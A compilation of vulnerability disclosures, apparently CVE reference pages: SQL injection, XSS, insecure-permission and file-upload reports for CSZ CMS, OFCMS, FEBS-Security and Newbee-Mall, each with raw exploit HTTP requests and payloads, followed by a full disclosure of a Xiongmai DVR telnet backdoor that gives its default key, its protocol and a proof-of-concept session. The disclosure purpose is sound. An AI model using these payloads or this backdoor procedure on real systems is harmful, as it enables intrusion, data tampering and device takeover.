CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Members_editUser

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Members/editUser/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: 127_0_01_cszsess=bkmcrultec13pmpnos5mb208vtnbophc; cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=d5df85a9d7e7227524a43e3f510a3ac1;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27162: SQL Injection vulnerability  on cszcms_admin_Members_editUser · Issue #44 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Users_editUser

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Users/editUser/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=ac52710dd12b2ae2241aaf6c83f68415; 127_0_01_cszsess=dt2ll8telivrlubjmmkh34ppo976eqea;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27163: SQL Injection vulnerability  on cszcms_admin_Users_editUser · Issue #45 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Users_viewUsers

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Users/viewUsers/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: 127_0_01_cszsess=dt2ll8telivrlubjmmkh34ppo976eqea; cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=e37ee84201b977b79a3b574b64a6a160;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27164: SQL Injection vulnerability  on cszcms_admin_Users_viewUsers · Issue #42 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Plugin_manager_setstatus

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Plugin_manager/setstatus/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/admin/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=e37ee84201b977b79a3b574b64a6a160; 127_0_01_cszsess=c3vlui957el8pk143j875684bjshnqbi;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27165: SQL Injection vulnerability  on cszcms_admin_Plugin_manager_setstatus · Issue #41 · cskaza/cszcms

A cross-site scripting (XSS) vulnerability at /ofcms/company-c-47 in OFCMS v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comment text box.

\[Suggested description\]  
Cross-site scripting vulnerability exists in the front page of OFCMS system. The user comment function in the foreground of the system does not escape the input parameters effectively. In addition, the comment function does not require login verification, which leads to a high risk of cross-site scripting vulnerability.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

GET /ofcms/api/v1/comment/save.json?comment\_content=%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111&content\_id=47&site\_id=1&check\_status=1&\_=1647846678826 HTTP/1.1  
Host: localhost:7000  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:7000/ofcms/company-c-47.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: JSESSIONID=2F8C11250ADB9A9DA125C3A0F9B7C8BA  
Connection: close

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability to prove\]  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173209_bea2fadd_9017458.png "屏幕截图.png")  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173224_66a3382a_9017458.png "屏幕截图.png")  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173236_85998832_9017458.png "屏幕截图.png")

CVE-2022-27961: There is a stored xss vulnerability exists in ofcms · Issue #I4Z8QU · 欧福/ofcms - Gitee.com

Insecure permissions configured in the user_id parameter at SysUserController.java of OFCMS v1.1.4 allows attackers to access and arbitrarily modify users' personal information.

\[Suggested description\]  
Information leakage vulnerability exists in the ofCMS background. As the detail method in SysUserController does not securely limit the user\_id parameter passed, any background user can view the personal information of other users by modifying the value of user\_id.

![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173625_5acb7880_9017458.png "屏幕截图.png")

\[Vulnerability Type\]  
Information disclosure

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

POST /ofcms/admin/system/user/detail.json HTTP/1.1  
Host: localhost:7000  
Content-Length: 54  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:7000  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:7000/ofcms/admin/f.html?p=system/user/edit.html&topMode=readonly&user\_id=3  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: JSESSIONID=B07DD54FA7B0F4A0B6F042CBEFD725E0  
Connection: close

p=system%2Fuser%2Fedit.html&topMode=readonly&user\_id=1

\[Attack Type\]  
Remote

\[Vulnerability to prove\]  
1.Enter the system background, open the Burpsuite agent function, click "Basic Information"  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173657_5c32e5ce_9017458.png "屏幕截图.png")

2.To obtain captured packet data，change the value of user\_id to 1.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173716_2ec15598_9017458.png "屏幕截图.png")

3.Click send data package, popup user basic information window, but the current user's input has not been transmitted.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173737_b6f3da7e_9017458.png "屏幕截图.png")

4.To obtain captured packet data, change the value of user\_id to 1.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173803_847ecc61_9017458.png "屏幕截图.png")

5.The administrator successfully obtains the account information after sending the data packet.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173832_abf99747_9017458.png "屏幕截图.png")

CVE-2022-27960: There is a Information disclosure vulnerability exists in ofcms · Issue #I4Z8SS · 欧福/ofcms - Gitee.com

Insecure permissions configured in the userid parameter at /user/getuserprofile of FEBS-Security v1.0 allows attackers to access and arbitrarily modify users' personal information.

**There is a security vulnerability exists in FEBS-Security.**

\[Suggested description\] The user / getuserprofile method in FEBS security project lacks the verification of userid, so that any user can modify the personal information of other users through the user / updateuserprofile method. via a Google search in url:http://localhost:8080/user/updateUserProfile

\[Vulnerability Type\] Insecure permissions

\[Vendor of Product\] https://github.com/febsteam/FEBS-Security

\[Affected Product Code Base\] v1.0

\[Affected Component\] //受影响的组件 POST /web\_info/save.json HTTP/1.1 Host: localhost:9105 Content-Length: 213 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" Accept: application/json, text/javascript, _/_; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost:9105 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:9105/web\_info/edit.action Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=955307B507B1FD2D9AE8E69C6EABFB75; navUrl=http://localhost:9105/admin/basic.action Connection: close

name=Javaex%E8%AE%BA%E5%9D%9B&domain=http%3A%2F%2Fwww.javaex.cn%2F&email=291026192%40qq.com&recordNumber=%E8%8B%8FICP%E5%A4%8718008530%E5%8F%B7&license=1&statisticalCode= your xss payload

\[Attack Type\] Remote

\[Proof of concept\]

1.There are security vulnerabilities in the personal information modification module of this project. It is known from the source code that the function of modifying personal information is to judge the user according to the incoming userid.

    @RequestMapping("user/getUserProfile")
    @ResponseBody
    public ResponseBo getUserProfile(Long userId) {
        try {
            MyUser user = new MyUser();
            user.setUserId(userId);
            return ResponseBo.ok(this.userService.findUserProfile(user));
        } catch (Exception e) {
            log.error("获取用户信息失败", e);
            return ResponseBo.error("获取用户信息失败，请联系网站管理员！");
        }
    }
    
    @RequestMapping("user/updateUserProfile")
    @ResponseBody
    public ResponseBo updateUserProfile(MyUser user) {
        try {
            this.userService.updateUserProfile(user);
            return ResponseBo.ok("更新个人信息成功！");
        } catch (Exception e) {
            log.error("更新用户信息失败", e);
            return ResponseBo.error("更新用户信息失败，请联系网站管理员！");
        }
    }
    

2.Use burpsuite to capture packets and modify userid

![image-20220215135415477](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135415477.png)

3.The userid of the currently logged in user is 171, and the modified userid is 172.Enter the modify personal information page.

![image-20220215135703895](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135703895.png)

4.After modifying any content, click save. Get packet capture data.

![image-20220215135841905](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135841905.png)

5.After saving successfully, exit the current login user, switch to the user with userid 172 just modified, and enter the page of viewing personal information.Vulnerability recurrence completed.

![image-20220215140035912](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215140035912.png)

CVE-2022-27958: CVE-Request/febs.md at main · afeng2016-s/CVE-Request

Newbee-Mall v1.0.0 was discovered to contain an arbitrary file upload via the Upload function at /admin/goods/edit.

\[Suggested description\]  
A file upload vulnerability exists in NewBee mall. Because the upload method of uploadcontroller can bypass the upload restriction by modifying the file format suffix.

\[Vulnerability Type\]  
File upload vulnerability

\[Vendor of Product\]  
https://github.com/newbee-ltd/newbee-mall

\[Affected Product Code Base\]  
v1.0.0

\[Affected Component\]  
POST /admin/upload/file HTTP/1.1  
Host: localhost:28089  
Content-Length: 671  
Cache-Control: max-age=0  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
sec-ch-ua-mobile: ?0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost:28089/  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Dest: iframe  
Referer: http://localhost:28089/admin/goods/edit/10907  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: locale=zh-cn; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2  
Connection: close

\------WebKitFormBoundaryoXATzrr6JWhnTx5Q  
Content-Disposition: form-data; name="file"; filename="1.html.png"  
Content-Type: image/png

<script type="text/javascript" src="http://www.qq.com/404/search\_children.js" charset="utf-8" homePageUrl="{{domain}}" homePageName="{{siteName}}"></script>

            <script>alert("xss")</script>
        </div>
    </div>
    

\------WebKitFormBoundaryoXATzrr6JWhnTx5Q--

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
1.Access address http://localhost:28089/admin/goods , select a commodity information to modify and enter the file upload page.  
![image](https://user-images.githubusercontent.com/85676107/156484791-7cf3819d-08ae-4b5a-b6dd-c41ca09e25f1.png)  
2.Open burpsuite packet capturing agent and click to upload pictures.  
![image](https://user-images.githubusercontent.com/85676107/156484843-1ac1fefa-ee37-45dd-a800-bf6fd74d788d.png)  
3.By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix.  
![image](https://user-images.githubusercontent.com/85676107/156484894-ec280ca5-9f84-4499-9763-e57fb297b504.png)  
4.Modify the value of filename to 1.html  
![image](https://user-images.githubusercontent.com/85676107/156484948-9d5736a9-5132-4f65-8a7b-e6f0b281c3e3.png)  
Get the access path to file upload  
![image](https://user-images.githubusercontent.com/85676107/156484999-7ae125b6-0f2c-4a1d-bb89-a0496dc26126.png)  
Complete data update  
![image](https://user-images.githubusercontent.com/85676107/156485043-07f12491-d25b-4c33-89fd-107211a2431c.png)  
5.Access the upload file path, and the vulnerability reproduction is completed.  
![image](https://user-images.githubusercontent.com/85676107/156485114-79f128cd-a0fb-4d86-8e48-5b101d3c24b8.png)

\[Defective code\]  
![image](https://user-images.githubusercontent.com/85676107/156485179-496031ed-1ff4-4d46-bd95-c8c839fde36a.png)

CVE-2022-27477: There is a File upload vulnerability exists in newbee-mall · Issue #63 · newbee-ltd/newbee-mall

A cross-site scripting (XSS) vulnerability at /admin/goods/update in Newbee-Mall v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the goodsName parameter.

\[Suggested description\]  
There is a cross site scripting vulnerability in the commodity information modification module in the main version of NewBee mall. The vulnerability stems from the fact that the form submission module that modifies the commodity information does not restrict or escape the sensitive characters entered, causing the execution of malicious JS code to trigger JS pop-up.

\[Vulnerability Type\]  
Cross site scripting vulnerability

\[Vendor of Product\]  
https://github.com/newbee-ltd/newbee-mall

\[Affected Product Code Base\]  
v1.0.0

\[Affected Component\]

    POST /admin/goods/update HTTP/1.1
    Host: localhost:28089
    Content-Length: 392
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    Accept: */*
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: application/json
    Origin: http://localhost:28089
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:28089/admin/goods/edit/10907
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=5B28A8C926D035BCC4A809131899B51D
    Connection: close
    
    {"goodsId":"10907","goodsName":"鐖辩柉<script>alert(\"xss\")</script>","goodsIntro":"xxx","goodsCategoryId":"47","tag":"鐖辩柉","originalPrice":"1","sellingPrice":"1","stockNum":"0","goodsDetailContent":"<p>hhh</p><p><br/></p>","goodsCoverImg":"http://localhost:28089/upload/20220303_10153124.html","goodsCarousel":"http://localhost:28089/upload/20220303_10153124.html","goodsSellStatus":"0"}
    

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
1.Access address http://localhost:28089/admin/goods , select the commodity information to be modified and enter information editing.  
![image](https://user-images.githubusercontent.com/85676107/156488864-c47eee7c-1052-44a4-af50-a2febdbf9888.png)

2.Enter <script>alert(“xss”)</script> in the input box and click Save to complete the form information submission.  
![image](https://user-images.githubusercontent.com/85676107/156488901-ae7b7b65-2326-4aa5-9365-340ac7b58c20.png)

![image](https://user-images.githubusercontent.com/85676107/156488941-164b4a54-15b1-40f7-8c1b-902e0a168479.png)

3.The pop-up window is triggered when the page is refreshed, and the loophole reproduction is completed  
![image](https://user-images.githubusercontent.com/85676107/156488974-0f39a2b7-a699-4f35-a7ee-1a25e54a693d.png)

CVE-2022-27476: There is a Cross site scripting vulnerability exists in newbee-mall · Issue #64 · newbee-ltd/newbee-mall

FOSCAM Camera FI9805E with firmware V4.02.R12.00018510.10012.143900.00000 contains a backdoor that opens Telnet port when special command is sent on port 9530.

![](https://habrastorage.org/r/w1560/webt/r_/3d/ko/r_3dkof6_ydvswrt0m0pbe3pd4q.png)

This is a full disclosure of recent backdoor integrated into DVR/NVR devices built on top of HiSilicon SoC with Xiaongmai firmware. Described vulnerability allows attacker to gain root shell access and full control of device. Full disclosure format for this report has been chosen due to lack of trust to vendor. Proof of concept code is presented below.  

**Previous work and historical context**

Earliest known versions of it had telnet access enabled with a static root password which can be recovered from firmware image with (relatively) little computation effort. This vulnerability was covered by previous author's article (in Russian) in 2013. In 2017 Istvan Toth did a most comprehensive analysis of DVR device's firmware. He also discovered remote code execution vulnerability in the built-in webserver and many other vulnerabilities. It's worth noting that disclosure was ignored by vendor.

More recent firmware versions had telnet access and debug port (9527/tcp) disabled by default. Instead they had open port 9530/tcp which was used to accept special command to start telnet daemon and enable shell access with static password which is the same for all devices. Such case was covered by these articles:

*   https://www.cnblogs.com/mmseh/p/6537924.html, 2017 (in Chinese)
*   https://habr.com/ru/post/332526/, 2017 (in Russian, by Habr user CentALT)

Most recent firmware versions have open port 9530/tcp listening for special commands, but require cryptographic challenge-response authentication for them to be committed. This is a subject of actual disclosure.

**Technical details**

Vulnerable DVR/NVR/IP camera devices under discussion are running Linux with minimal set of utilities provided by busybox, main video application `Sofia` and a small set of custom auxilary utilities responsible for support of device operation. Hardware has ARM-based CPU tens to hundreds megabytes of RAM.

Device with vulnerable firmware has `macGuarder` or `dvrHelper` process running and accepting connections on TCP port 9530. Code and log strings suggest that `macGuarder` formerly was a separate process, but later it's functions were merged into `dvrHelper` process as a separate thread.

It's worth noting that earlier versions of firmware had dvrHelper process compiled into busybox as additional applet. Taking into account busybox has GNU GPL license, it is possible that license violation takes place because dvrHelper software was distributed without source code.

Successful backdoor activation process is following:

1.  Client opens connection to port TCP port 9530 of device and sends string `OpenTelnet:OpenOnce` prepended with byte indicating total message length. This step is last for previous versions of backdoor. Probably telnetd was already started if there no response after this step.
2.  Server (device) anwers with string `randNum:XXXXXXXX` where `XXXXXXXX` is 8-digit random decimal number.
3.  Client uses it's pre-shared key and constructs encryption key as concatenation of received random number and PSK.
4.  Client encrypts random number with encryption key and sends it after string `randNum:`. Entire message is prepended with byte indicating total length of message.
5.  Server loads same pre-shared key from file `/mnt/custom/TelnetOEMPasswd` or uses default key `2wj9fsa2` if file is missing.
6.  Server performs encryption of random number and verifies result is identical with string from client. On success server sends string `verify:OK` or `verify:ERROR` otherwise.
7.  Client encrypts string `Telnet:OpenOnce`, prepends it with total length byte, `CMD:` string and sends to server.
8.  Server extracts and decryptes received command. If decryption result is equal to string `Telnet:OpenOnce` it responds with `Open:OK`, enables debug port 9527 and starts telnet daemon.

Entire authentication process may resemble some sort of HMAC challenge-response authentication except it uses symmetric cipher instead of hash. This particular symmetric cipher resembles some variation of 3DES-EDE2 for keys longer than 8 bytes and similar to simple DES for shorter keys.

It's easy to see that all clients need for successful authentication is knowledge of PSK (which is common and can be retrieved from firmware in plaintext) and implementation of that symmetric block cipher. Recovery of that symmetric cipher implementation is most difficult, but it was achieved during this research. Exploration and tests were conducted using this set of tools:

*   Ghidra 9.1.1 from NSA (https://ghidra-sre.org/) — suite for binary executeble code inspection.
*   QEMU (more specifically qemu-user in Debian chroot — https://www.qemu.org/) — software which allows foreign architecture binaries (ARM) to be executed transparently on host.
*   Common GNU utilities and toolchain.

Once telnet daemon activated, it's very likely it will accept one of following login/password pairs:

These passwords can be recovered from firmware as well by bruteforce of hash in `/etc/passwd` file. Modern consumer-grade GPGPU with hashcat is capable to find pre-image for hash in a matter of hours.

Debug port 9527 accepts same login/password as Web UI and it also provides some shell access and functions to control the device. Speaking of Web UI accounts, attacker may reset password or grab password hashes from `/mnt/mtd/Config/Account*` files. Hash function was described in previous research by Istvan Toth.

**Affected devices**

Previous research has a good collection of brands affected: https://github.com/tothi/pwn-hisilicon-dvr#summary. There are dozens of brands and hundreds of models.

Author of this report, reposing on survey across population of random IP addresses, estimates total number of vulnerable devices exposed via Internet somewhere between hundreds of thousands and millions.

Probably, the easiest way to check whether your device is vulnerable is PoC code provided below.

**Testing vulnerability**

PoC code: https://github.com/Snawoot/hisilicon-dvr-telnet.

Building PoC program from source: run `make` in source directory.

Usage: `./hs-dvr-telnet HOST PSK`

Most common PSK is default one: `2wj9fsa2`.

Example session:

$ telnet 198.51.100.23
Trying 198.51.100.23...
telnet: Unable to connect to remote host: Connection refused
$ ./hs-dvr-telnet 198.51.100.23 2wj9fsa2
Sent OpenTelnet:OpenOnce command.
randNum:46930886
challenge=469308862wj9fsa2
verify:OK
Open:OK
$ telnet 198.51.100.23
Trying 198.51.100.23...
Connected to 198.51.100.23.
Escape character is '^\]'.
LocalHost login: root
Password: 

IP address in example above is an IP address from address block reserved for documentation by RFC5737.

Device should be considered vulnerable if:

*   Telnet port opens after `hs-dvr-telnet` run.
*   Device responds with challenge on `hs-dvr-telnet` inquiry. Even if verification fails due to wrong PSK, there exists correct PSK extractable from firmware.
*   hs-dvr-telnet stucks awaiting for response, but telnet port opens (this will happen with older firmware versions which require only `OpenTelnet:OpenOnce` command).

  
**Mitigation**

Taking into account earlier bogus fixes for that vulnerability (backdoor, actually) it is not practical to expect security fixes for firmware from vendor. Owners of such devices should consider switching to alternatives.

However, if replacement is not possible, device owners should completely restrict network access to these devices to trusted users. Ports involved in this vulnerability is 23/tcp, 9530/tcp, 9527/tcp, but earlier researches indicate there is no confidence other services implementation is solid and doesn't contain RCE vulnerabilities.

**Subjects not covered by this research**

Code analysis revealed that authentication procedure on port 9530 decrypts «CMD» payload with arbitrary size (up to size of buffer read from socket at once) into a buffer on stack with fixed size of 32 bytes. Targeted exploitation of this overflow requires knowledge of PSK, therefore it's more practical to proceed normal way to gain access. On the other hand, garbage sent with CMD command may cause stack corruption and dvrHelper daemon failure. Possible effects of that (potential) failure wasn't explored because macGuarder/dvrHelper backdoor functionality appears strictly superior and straightforward approach.

**UPDATE** (2020-02-05 02:10+00:00): Istvan Toth, author of previous research on this subject, presented his own implementation of PoC program: https://github.com/tothi/hs-dvr-telnet Given implementation is written in pure Python code and implements symmetric cipher in more clear way. Also it outlines differences between 3DES cipher variant used by Xiongmai for backdoor authentication and original 3DES cipher. These differences can be expressed by this git commit: https://github.com/tothi/pyDes/commit/7a26fe09dc5b57b175c6439fbbf496414598a7a2.

**UPDATE** (2020-02-05 17:28+00:00): Other researchers and habr users had pointed out such vulnerability is restricted to devices based on Xiongmai (Hangzhou Xiongmai Technology Co, XMtech) software, including products of other vendors which ship products based on such software. At this moment HiSilicon can't be held responsible for backdoor in dvrHelper/macGuarder binary.

**UPDATE** (2020-02-21 10:30+00:00): Xiaongmai acknowledged vulnerability and released a Security Advisory: link, archive 1, archive 2. Body of actual article has been updated accordingly in order to reflect origin of vulnerability properly.

Tag

#apple